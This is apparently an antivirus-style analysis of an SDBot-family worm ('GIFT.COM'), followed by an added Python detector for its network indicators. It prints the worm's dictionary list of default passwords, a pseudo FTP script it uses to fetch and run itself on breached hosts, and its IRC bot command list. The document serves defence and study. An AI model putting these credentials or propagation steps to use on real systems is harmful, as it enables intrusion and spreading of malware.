Visible Symptoms
- Possible firewall alert that the file "GIFT.COM"
is attempting to bind with TCP port 6667 and function
as a backdoor or server
- Compromised systems are slow to respond due to heavy
outbound traffic on TCP port 445 with other machines
Detailed Analysis
The virus also has the following characteristics -
- can trick users
into running it if received as a hyperlink
in a message from a known AIM or AOL contact
- has a built-in FTP daemon
- could connect to systems across a network and compromise
them by using hard-coded exploits
against the following vulnerable (if unpatched) services -
  uPnP
  Workstation (tcp 139)
  asn.1
- could propagate to systems that have open
shares across a local/wide area network
- may connect to the IRC server and await
commands from a malicious user
such as sending messages to
AIM/AOL contacts with a hyperlink to the infectious
file
Dictionary attack
This virus carries a short table of logon names and
passwords to try when attempting to break into computer
systems across a network. The use of a list is also
known as a "dictionary attack" method. Below
are some of the logon names and passwords the virus
will try -
admin
root
A
server
asdfgh
asdf
!@#$%^&
!@#$%^
!@#$%
!@#$
654321
123456
12345
1234
123
1
111
1
administrator
Network spreading routine
The virus will spawn a thread that functions on this
TCP port as an FTP server. The server responds with
this detail, if connected to a logon instance -
220 Reptile welcomes you..
When exiting the server, it responds with this string -
221 Goodbye happy r00ting.
Next, the virus will attempt to connect with systems
on the same Class A subnet as the infected system using
TCP port 445. If a connection can be made, the virus
uses various exploits to
gain access to the system. Once access is obtained,
the virus generates an FTP script and writes it to the
system with these pseudo-instructions:
open %IP%
%TCP port%
user 1 1
get %filename%
quit
The virus then initiates FTP.EXE locally on the compromised
system to retrieve a copy of the virus from the connecting
system, and execute it.
Backdoor functionality
The virus will create a thread that functions as a backdoor,
using a high TCP port such as 6667. The virus connects
with an IRC server into these channels, in order to
receive instructions from a malicious user -
#raim5
#raim4
#raim3
#raim2
Instructions include some of the following (the original
listing highlights the key spreader instructions in red) -
dasr33deasde
dsad32gghe
testdlls
cel
version
secure
unsecure
process
kill
del
create
nickupdate
randnick
exploitftpd
sniffer
iestart
encrypt
join
part
raw
prefix
resolve
dns
aimspread
currentip
stats
banner
advscan
scanall
lsascan
ntscan
wksescan
wksoscan
flusharp
flushdns
system
r.down
r.wget
uptime
status
pnp
wksvce
WKSSVCE
WKSSVCO
WKSSVC2
WKSSVCE139
WKSSVCO139
WKSSVC2139
asn
wksvc2139
wksvce
wksvco
wksvco139
jump
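As an added example (not part of the original analysis), a small Python detector that applies the behaviour described above to a constructed flow log: it flags hosts fanning out on TCP 445 inside their own Class A range, joins to the #raim IRC channels on port 6667, and the Reptile FTP banners. The log format, threshold and addresses are assumptions.

```python
import re
from collections import defaultdict

# Indicators drawn from the analysis above.
FTP_BANNERS = ("220 Reptile welcomes you..", "221 Goodbye happy r00ting.")
IRC_CHANNELS = ("#raim2", "#raim3", "#raim4", "#raim5")
# Assumed (constructed) flow-log format: "<ts> src=<ip> dst=<ip> dport=<port> [msg=<payload>]"
LOG_RE = re.compile(r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)(?: msg=(?P<msg>.*))?$")

def parse(line):
    m = LOG_RE.search(line)
    return m.groupdict() if m else None

def find_445_scanners(lines, min_targets=5):
    """Map each source to the number of distinct hosts in its own /8 it touched on TCP 445."""
    targets = defaultdict(set)
    for line in lines:
        rec = parse(line)
        # The bot sweeps addresses sharing its first octet (the "Class A" range); a spray across many hosts is the signal.
        if rec and rec["dport"] == "445" and rec["src"].split(".")[0] == rec["dst"].split(".")[0]:
            targets[rec["src"]].add(rec["dst"])
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}

def find_indicators(lines):
    """Return (src, reason) for IRC control-channel joins on 6667 and the bot's FTP banners."""
    hits = []
    for line in lines:
        rec = parse(line)
        if not rec or not rec["msg"]:
            continue
        if rec["dport"] == "6667" and any(ch in rec["msg"] for ch in IRC_CHANNELS):
            hits.append((rec["src"], "irc-control-channel"))
        if any(b in rec["msg"] for b in FTP_BANNERS):  # banner is sent by the infected host
            hits.append((rec["src"], "reptile-ftp-banner"))
    return hits

SAMPLE_LOG = [  # constructed sample; 10.1.2.3 plays the infected host
    "2004-03-17T10:00:01 src=10.1.2.3 dst=10.1.2.4 dport=445",
    "2004-03-17T10:00:01 src=10.1.2.3 dst=10.1.2.5 dport=445",
    "2004-03-17T10:00:02 src=10.1.2.3 dst=10.1.2.6 dport=445",
    "2004-03-17T10:00:02 src=10.1.2.3 dst=10.1.2.7 dport=445",
    "2004-03-17T10:00:03 src=10.1.2.3 dst=10.1.2.8 dport=445",
    "2004-03-17T10:00:03 src=10.1.2.3 dst=172.16.0.9 dport=445",  # outside its /8, not counted
    "2004-03-17T10:00:04 src=10.1.2.3 dst=10.9.9.9 dport=1045 msg=220 Reptile welcomes you..",
    "2004-03-17T10:00:05 src=10.1.2.3 dst=192.0.2.10 dport=6667 msg=JOIN #raim5",
    "2004-03-17T10:00:06 src=10.5.5.5 dst=10.5.5.6 dport=445",  # a single SMB session, benign
]
if __name__ == "__main__":
    print(find_445_scanners(SAMPLE_LOG), find_indicators(SAMPLE_LOG))
```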
Miscellaneous
Some web sites mention this threat sends messages to
other chat program applications such as Yahoo or MSN
Messenger. There was no evidence of this happening when
the virus was under scrutiny. This virus is part of
the SDBot family; however, due to media attention, the
virus name seems to have been predetermined by mass
appeal.